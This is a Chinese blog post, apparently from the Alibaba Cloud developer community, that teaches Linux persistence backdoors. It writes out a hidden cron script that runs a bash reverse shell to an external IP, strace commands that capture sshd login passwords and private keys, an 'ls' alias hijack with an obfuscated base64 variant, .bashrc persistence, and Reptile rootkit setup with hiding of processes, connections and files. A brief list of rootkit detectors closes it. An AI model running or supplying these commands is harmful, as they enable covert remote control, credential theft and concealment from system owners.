【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务-阿里云开发者社区

【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务

2024-06-19 22

版权

本文内容由阿里云实名注册用户自发贡献，版权归原作者所有，阿里云开发者社区不拥有其著作权，亦不承担相应法律责任。具体规则请查看《阿里云开发者社区用户服务协议》和《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容，填写侵权投诉表单进行举报，一经查实，本社区将立刻删除涉嫌侵权内容。

简介： 【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务

权限维持-Linux-定时任务-Cron后门

利用系统的定时任务功能进行反弹Shell

1、编辑后门反弹

vim /etc/.backshell.sh

#!/bin/bash
bash -i >& /dev/tcp/47.94.xx.xx/3333 0>&1
chmod +x /etc/.backshell.sh

2、添加定时任务

vim /etc/crontab
*/1 * * * * root /etc/.backshell.sh

成功反弹shell

权限维持-Linux-监控功能-Strace后门

strace是一个动态跟踪工具，它可以跟踪系统调用的执行。

我们可以把他当成一个键盘记录的后门，来扩大我们的信息收集范围

1、记录sshd明文

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 32 2> /tmp/.sshd.log &)
grep -E 'read\(6, ".+\\0\\0\\0\\.+"' /tmp/.sshd.log

唯一的不足就是.sshd.log文件不停的在记录登陆字节流，生成的文件特别大

通过服务器监控面板可以明显看到

2、记录sshd私钥

(strace -f -F -p `ps aux|grep "sshd -D"|grep -v grep|awk {'print $2'}` -t -e trace=read,write -s 4096 2> /tmp/.sshd.log &)
grep 'PRIVATE KEY' /tmp/.sshd.log

权限维持-Linux-命令自定义-Alias后门

alias命令的功能：为命令设置别名

定义：alias ls = ‘ls -al’

删除：unalias ls

每次输入ls命令的时候都能实现ls -al

1、简单：

alias ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/47.94.xx.xx/3333 0>&1; };alerts'

这样目标执行ls命令后可以上线，不过ls命令会被阻塞在那里，很容易引起怀疑，当结束终端窗口时，反弹shell的会话也会随着被终结，而且更改后的alias命令只在当前窗口才有效(重启也会失效)

2、升级：

alias ls=‘alerts(){ ls $* --color=auto;python3 -c "import base64,sys;exec(base64.b64decode({2:str,3:lambda b:bytes(b,’‘‘UTF-8’’‘)} alias alias='alerts(){ alias "$@" | grep -v unalias | sed "s/alerts.*lambda.*/ls --color=auto'\''/";};alerts'

3、持久化+隐藏：重启依旧生效

vim /etc/upload
vim ～/.bashrc
if [ -f /etc/upload ]; then
. /etc/upload
fi

权限维持-Linux-内核加载LKM-Rootkit后门

传统后门通过TCP连接，容易被发现

现在常用的linux维持权限的方法大多用crontab和开机自启动，同时使用的大多是msf 或者其它的tcp连接来反弹shell ,这种做法比较容易被管理员发现。所以我们想有一个非tcp连接、流量不容易被怀疑的后门，并且在大量的shell的场景下，可以管shell，Reptile刚好是种LKM rootkit，因此具有很好的隐藏性和强大的功能。

https://github.com/f0rb1dd3n/Reptile/releases/

自动化脚本搭建

Centos，Ubuntu

$kernel=`uname -r`
## centos
  yum -y install perl vim gcc make g++ unzip
  # 由于Cenots内核管理不便，所以使用下载对应版本的kernel-devel到本地
  yum -y localinstall kernel-devel-"$kernal".rpm
  cd Reptile-2.0/ && chmod +x ./setup.sh
  ./setup.sh install <<EOF
reptile
hax0r
s3cr3t
reptile
666
y
47.94.xx.xx
4444
1
EOF

## ubuntu
  apt-get install vim gcc make g++ unzip -y
  apt-get -y install linux-headers-$(uname -r)
  cd Reptile-2.0/ && chmod +x ./setup.sh
  ./setup.sh install <<EOF
reptile
hax0r
s3cr3t
reptile
666
y
10.10.10.129
4444
1
EOF

注意Rootkit是安装在目标主机上的

安装成功后，不显示文件夹，但是实际上是存在的

1、使用参考：

https://github.com/f0rb1dd3n/Reptile/wiki

隐藏进程: /reptile/reptile_cmd hide

显示进程: /reptile/reptile_cmd show

nohup ping 114.114.114.114 &
ps -ef | grep ping | grep -v grep
/reptile/reptile_cmd hide 4774
ps -ef | grep ping | grep -v grep

隐藏后门连接

隐藏连接: /reptile/reptile_cmd udp hide

显示连接: /reptile/reptile_cmd tcp show

netstat -anpt | grep 100.100.45.106
/reptile/reptile_cmd tcp 100.100.45.106 443 hide

隐藏文件：

文件名中带reptile的都会被隐藏

mkdir reptile_whgojp
mkdir reptile_file
ls -l
cd reptile_xiaodi

2、高级玩法

客户端安装

./setup.sh client

设置连接配置

LHOST     47.94.236.117     Local host to receive the shell
LPORT     4444  Local       port to receive the shell
SRCHOST     47.94.236.117     Source host on magic packets (spoof)
SRCPORT     666           Source port on magic packets (only for TCP/UDP)
RHOST     121.43.154.113      Remote host
RPORT     22            Remote port (only for TCP/UDP)
PROT      TCP           Protocol to send magic packet (ICMP/TCP/UDP)
PASS      s3cr3t          Backdoor password (optional)
TOKEN     hax0r         Token to trigger the shell

关于Rootkit的检测：

linux平台下：chkrootkit、rkhunter、OSSEC、zeppoo等

Windows平台下：BlackLight、RootkitRevealer、Rootkit Hook Analyzer

https://github.com/grayddq/GScan

【权限维持】Linux&Rootkit后门&Strace监控&Alias别名&Cron定时任务

权限维持-Linux-定时任务-Cron后门

权限维持-Linux-监控功能-Strace后门

权限维持-Linux-命令自定义-Alias后门

关于Rootkit的检测：

热门文章

最新文章

相关课程

相关电子书

推荐镜像